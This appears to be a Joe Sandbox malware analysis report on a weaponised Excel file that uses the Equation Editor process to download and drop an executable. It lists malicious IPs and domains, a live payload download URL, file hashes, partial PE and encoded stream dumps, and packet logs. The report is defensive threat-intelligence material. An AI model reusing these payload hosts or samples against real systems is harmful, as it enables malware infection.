                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.0.209.73 | bitcointradel.com | Canada | 35893 | ACPCA | true
216.239.34.21 | www.fisioletsgo.com | United States | 15169 | GOOGLEUS | false
118.67.131.217 | www.luckyfandom.com | Korea, Republic of | 24395 | CLEAR-AS-APClearNetworksPtyLtdAU | true
34.102.136.180 | executive-air.net | United States | 15169 | GOOGLEUS | false
131.153.37.4 | mikeloayza.com | United States | 20454 | SSASN2US | true

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:553293
                                              Start date:14.01.2022
                                              Start time:16:03:14
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:SWIFT - Copy - Copy.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLSX@9/6@6/5
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 25.8% (good quality ratio 24.8%)
                                              • Quality average: 71.7%
                                              • Quality standard deviation: 28.6%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 114
                                              • Number of non-executed functions: 41
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• Not all processes were analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
16:03:46 | API Interceptor | 106x Sleep call for process: EQNEDT32.EXE modified
16:03:51 | API Interceptor | 74x Sleep call for process: Pcportk28.exe modified
16:04:12 | API Interceptor | 215x Sleep call for process: wininit.exe modified
16:04:57 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

Match | Associated Sample Name / URL | Detection | Context
118.67.131.217 | commercial invoice_010202201.exe | malicious | www.friendschance.com/igwa/?JXRL2Htp=kcJK5GFpDKPtevBg1nN4AS2uwE6IDbqQL9Esa69lHd4fhlo3nfdugBZ3P+KHWdbb77iO&2dyD8R=k0GL
118.67.131.217 | product list.xlsx | malicious | www.canvasb.net/n6fr/?U8=Tq3sB8hqGP08zpKNikSFkTYM2yQjd8k/meAwEMAvMB5SzjUo5qTtVsyXEnNf6niosm0nlg==&gp-83T=Xtxd2n1hUdmt
118.67.131.217 | DH146890Y.exe | malicious | www.frontiervalley8.com/u5eh/?5jZ0yH=uh8othQVHLF/6zHJZZdPMo2k/QZrncPYfe97AgdLy2ZEmL8zQjvjOm0Ax+MDL5kTLyKfmhqLYA==&Cxlpd=4hu4_hnx
118.67.131.217 | D4L4075.exe | malicious | www.frontiervalley8.com/u5eh/?-ZwxCph=uh8othQVHLF/6zHJZZdPMo2k/QZrncPYfe97AgdLy2ZEmL8zQjvjOm0Ax+M6UIEQFkWYmhqMLw==&od6X=8pNLiPPXtpt
118.67.131.217 | Minutes of Meeting 23.10.2021.exe | malicious | www.ontactfactory.com/snec/?u6A=K4Bg8vtIRtuG13xcsudH6+oYDCyQsaEc56ljn8JSsb3Kl5A4x8QSyFSD/ohwVwuON5p7&mbi8J=1bstizF0enjhp8f
118.67.131.217 | Lv9eznkydx.exe | malicious | withcook.net/index.php

                                              Domains

                                              No context

                                              ASN

Match | Associated Sample Name / URL | Detection | Context
CLEAR-AS-APClearNetworksPtyLtdAU | commercial invoice_010202201.exe | malicious | 118.67.131.217
CLEAR-AS-APClearNetworksPtyLtdAU | DxVvqovrYn | malicious | 203.168.39.127
CLEAR-AS-APClearNetworksPtyLtdAU | product list.xlsx | malicious | 118.67.131.217
CLEAR-AS-APClearNetworksPtyLtdAU | DH146890Y.exe | malicious | 118.67.131.217
CLEAR-AS-APClearNetworksPtyLtdAU | D4L4075.exe | malicious | 118.67.131.217
CLEAR-AS-APClearNetworksPtyLtdAU | Minutes of Meeting 23.10.2021.exe | malicious | 118.67.131.217
CLEAR-AS-APClearNetworksPtyLtdAU | Lv9eznkydx.exe | malicious | 118.67.131.217
CLEAR-AS-APClearNetworksPtyLtdAU | b3astmode.x86 | malicious | 118.67.0.7
SSASN2US | cIc4vLO33F | malicious | 66.85.144.10
SSASN2US | zu6lzRqnng.exe | malicious | 131.153.142.106
SSASN2US | x86 | malicious | 64.38.210.198
SSASN2US | SecuriteInfo.com.Trojan.Siggen16.10960.21391.exe | malicious | 131.153.142.106
SSASN2US | IO11QGTU2c.exe | malicious | 131.153.142.106
SSASN2US | U8JqcTK00d | malicious | 66.85.144.28
SSASN2US | 4Nis1gCp1X.exe | malicious | 131.153.142.106
SSASN2US | 5VV3QPmgy8 | malicious | 66.85.144.16
SSASN2US | kwari.x86 | malicious | 209.188.7.206
SSASN2US | 3KzEktjDwJ.exe | malicious | 66.85.185.107
SSASN2US | 4voNJxxVOQ.exe | malicious | 66.85.185.107
SSASN2US | SecuriteInfo.com.Trojan.DownLoader44.11112.23850.exe | malicious | 66.85.185.107
SSASN2US | xd.arm | malicious | 108.170.53.117
SSASN2US | h1TYu4T867 | malicious | 66.85.156.247
SSASN2US | sora.arm7 | malicious | 192.198.194.139
SSASN2US | sora.x86 | malicious | 198.15.97.16
SSASN2US | xd.x86 | malicious | 198.15.85.48
SSASN2US | Software updated by Dylox.exe | malicious | 131.153.142.106
SSASN2US | RFQ_Invoice verification.xlsx | malicious | 131.153.37.3
SSASN2US | loeFlLTaic.exe | malicious | 108.170.14.102
ACPCA | phantom.x86 | malicious | 162.22.50.145
ACPCA | swaHv4o9Av | malicious | 162.0.156.139
ACPCA | J4I3oWIHfX | malicious | 162.56.224.1
ACPCA | DEC SOA_09012022.exe | malicious | 162.0.223.146
ACPCA | KLn7h2JLgt | malicious | 162.54.31.21
ACPCA | b0Ht6p5D1J | malicious | 162.9.191.49
ACPCA | 85kOai8Kfs | malicious | 162.64.37.98
ACPCA | arm | malicious | 162.52.209.57
ACPCA | gx86 | malicious | 162.33.56.255
ACPCA | SecuriteInfo.com.Linux.BackDoor.Tsunami.970.3006.9678 | malicious | 162.32.41.6
ACPCA | gx86 | malicious | 162.64.26.233
ACPCA | Fourloko.arm7-20211230-1450 | malicious | 162.60.248.101
ACPCA | loligang.arm | malicious | 162.20.0.165
ACPCA | 4ozT5pZbJI | malicious | 162.22.50.151
ACPCA | sf3rG3tuCE | malicious | 162.56.105.250
ACPCA | 1bQEi8dbIi | malicious | 162.32.122.185
ACPCA | 4Gl2OeRw58 | malicious | 162.54.255.172
ACPCA | 3Drgtl4mCQ | malicious | 162.54.84.214
ACPCA | 61xHx9ExnV | malicious | 162.128.106.179
ACPCA | RqnH4I3303 | malicious | 162.52.204.153

                                              JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
7dcce5b76c8b17472d024758970a406b | invoice payment 0098.ppa | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | FpgQY4ZKc4.docx | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | RmgO44zN8B.xlsx | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | o7GqaY5L5D.xlsx | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | PhishingAttachment.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | PhishingAttachment.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.Skarlet.3.Gen.16172.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.Agent.FRJZ.17141.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | 123000871884.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Heur.26941.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | 414729_45.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | 48599571-6.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Heur.31259.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.Skarlet.3.Gen.2852.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.Skarlet.3.Gen.7952.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.Skarlet.3.Gen.5350.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.Skarlet.3.Gen.16272.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Heur.24531.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Trojan.Skarlet.3.Gen.19861.xlsm | malicious | 131.153.37.4
7dcce5b76c8b17472d024758970a406b | SecuriteInfo.com.Heur.15230.xlsm | malicious | 131.153.37.4

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:https://mikeloayza.com/E9/i4L.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:HTML document, ASCII text
                                              Category:dropped
                                              Size (bytes):241
                                              Entropy (8bit):5.144431573763422
                                              Encrypted:false
                                              SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPfV8Ni+KqD:J0+ox0RJWWP98zT
                                              MD5:5C1BF763B986387E9E117DABF2FB37BC
                                              SHA1:29F8142D2580878381BBB0DFD7D333C924C24093
                                              SHA-256:9A0E4DD90EF8EFA0B54BBF9C1A810F227A9C4BA08AD315470A2BC519023F5DB0
                                              SHA-512:48397E5342820C32752A23EFC6D6776784ADA4950C591A21373B06DABA50467B489761C6018660D518B448A6B6F7121382DA33F916AC06905C1005952361B176
                                              Malicious:false
                                              Reputation:low
                                              Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p>.</body></html>.
                                              C:\Users\user\AppData\Local\Temp\7916.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.1464700112623651
                                              Encrypted:false
                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                              MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                              SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                              SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                              SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DF01B9A0A507F75E4B.TMP
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1708032
                                              Entropy (8bit):7.361455956824453
                                              Encrypted:false
                                              SSDEEP:49152:+QKkr5BOPqqENGfJbDan2Kmg6RsOEX0q:+Q7sNEYNDw
                                              MD5:1A8EF3975ACA5EEFAE5D35CFA752A22B
                                              SHA1:D4400575CB198B054E2FEED616010C57AD07525F
                                              SHA-256:17026E92707F76D3A8BE214E3EEA223A2A7630E162923B159DF6193837E0F91F
                                              SHA-512:B14A70C0BA99CDA8231C3419AC1B5F0EDB1AD3C451BE2B9E449E5FBA5C771FE0E24604F61DBA8D107088DFAE67C3A213B5017CE59AC2F1EBEA452E9B0FEFAB45
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\Pcportk28.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......

                                              Static File Info

                                              General

                                              File type:Microsoft Excel 2007+
                                              Entropy (8bit):7.998825501408383
                                              TrID:
                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                              • ZIP compressed archive (8000/1) 16.67%
                                              File name:SWIFT - Copy - Copy.xlsx
                                              File size:1400294
                                              MD5:338cbe8a882d7c941afe2cf895055bd5
                                              SHA1:f081a9d12054b2e1a59d3eae4fa65059db634268
                                              SHA256:097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
                                              SHA512:544deb29896756b4391cd46cd0e76154c837530a5e2512ef03c6dc90145f98d43b6c7469625ad082bfc0929940177808e62d3deafd6412a626f1c0301adc32d6
                                              SSDEEP:24576:Ggp3MkrfAEnTlQdzPqdACoEh1GxdIGbHXMFxPrt/Qe6KxwfqI+WSKbjqRJc3satR:/Mkr1ZsPqkEDGbfbH4L2sESKbCc3Ptek
                                              File Content Preview:PK...........T>...............[Content_Types].xmlUT...C..aC..aC..a.U.N.0..#.....q........7.......m<...=...............3.xx.h\1..6.J...(..`..T....w".$..r.C%....|.o......=V.&.gR...QX.....Cj..k....TM@....R.O..G.C....@...{..V5.#.N....9(.O..+`.....Y.....7....x

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OpenXML
                                              Number of OLE Files:1

                                              OLE File "/opt/package/joesandbox/database/analysis/553293/sample/SWIFT - Copy - Copy.xlsx"

                                              Indicators

                                              Has Summary Info:False
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:
                                              Contains Workbook/Book Stream:
                                              Contains PowerPoint Document Stream:
                                              Contains Visio Document Stream:
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:False

                                              Summary

                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16T00:00:00Z
                                              Last Saved Time:2021-04-20T13:49:29Z
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Thumbnail Scaling Desired:false
                                              Company:
                                              Contains Dirty Links:false
                                              Shared Document:false
                                              Changed Hyperlinks:false
                                              Application Version:12.0000

                                              Streams

                                              Stream Path: \x1oLe10nAtiVE, File Type: data, Stream Size: 1687673
                                              General
                                              Stream Path:\x1oLe10nAtiVE
                                              File Type:data
                                              Stream Size:1687673
                                              Entropy:7.35599527556
                                              Base64 Encoded:True
                                              Data ASCII:. ) ; . . 5 & . { . . . . . . . . . c % ~ . M . . 8 . . . . . . 5 . . . . 0 . . 2 Q . . . . . # . . . | . . . . . . . . E . u . V . / B ~ . . . . e S . z . . Q M p . & 5 . . . . . x . w v z . . W w . . . s . n . . 7 _ . . . . . . . < . . . / . . . . . . . k . K $ . B A h N . g . 4 . < s . . A # . . F A . . . . . . + . % . . . . ! . % . . J . . ! . . . P . . . T . B . v J d . . . . . V J g v . a . . . . . g . \\ t i ` . . K ) / . . v . . 4 . . . . . . ; . . = . . . . . . . 4 % . i d . w . . N c e . . . " .
                                              Data Raw:d0 29 3b 06 02 35 26 e3 7b ee 01 08 f7 a0 b8 bd bf e7 63 25 7e bd 4d 8c 8b 38 8b 0f ba b3 e6 15 35 81 c2 fd 80 30 cb 8b 32 51 ff d6 05 8d c2 23 01 05 02 7c e7 fe ff e0 e4 82 dd 0c 45 00 75 cc 56 d8 2f 42 7e a4 01 c7 20 b6 65 53 c3 7a f4 cc 51 4d 70 0d 26 35 fe b8 06 9c a4 78 89 77 76 7a e1 2e 57 77 06 a4 03 73 ff 6e bd 1a 37 5f 1b d5 a6 7f fe 8c ef 3c d1 a2 dc 2f b0 9d 9e f4 e8 ad
                                              Stream Path: HDsuMKhCbfmuqyxLqNuKc, File Type: empty, Stream Size: 0
                                              General
                                              Stream Path:HDsuMKhCbfmuqyxLqNuKc
                                              File Type:empty
                                              Stream Size:0
                                              Entropy:0.0
                                              Base64 Encoded:False
                                              Data ASCII:
                                              Data Raw:

                                              Network Behavior

                                              Snort IDS Alerts

                                               Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                               01/14/22-16:06:04.365376 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49172 | 34.102.136.180 | 192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                               Jan 14, 2022 16:04:33.911838055 CET | 49167 | 80 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.100852013 CET | 80 | 49167 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.100967884 CET | 49167 | 80 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.101399899 CET | 49167 | 80 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.290345907 CET | 80 | 49167 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.291004896 CET | 80 | 49167 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.291089058 CET | 49167 | 80 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.481738091 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.481784105 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.481870890 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.489912987 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.489944935 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.890429974 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.890625954 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.906006098 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:34.906070948 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.906405926 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:34.906527042 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.145149946 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.185965061 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.331522942 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.331724882 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.515368938 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.515399933 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.515492916 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.515561104 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.515573978 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.515604973 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.515619040 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.515795946 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.697778940 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.698010921 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.698127985 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.698180914 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.698206902 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.698276043 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.698321104 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.698429108 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.698492050 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.698589087 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.698719978 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.880594015 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.880655050 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.880733013 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.880759001 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.880779982 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.880796909 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.880805016 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.880819082 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.880861044 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.880877972 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.880930901 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.880981922 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.881046057 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.881048918 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.881058931 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:35.881093979 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:35.881150961 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.063811064 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.063884020 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.064023972 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.064043999 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.064068079 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.064124107 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.064136028 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.064156055 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.064169884 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.064194918 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.064238071 CET | 49168 | 443 | 192.168.2.22 | 131.153.37.4
                                               Jan 14, 2022 16:04:36.064457893 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
                                               Jan 14, 2022 16:04:36.064536095 CET | 443 | 49168 | 131.153.37.4 | 192.168.2.22
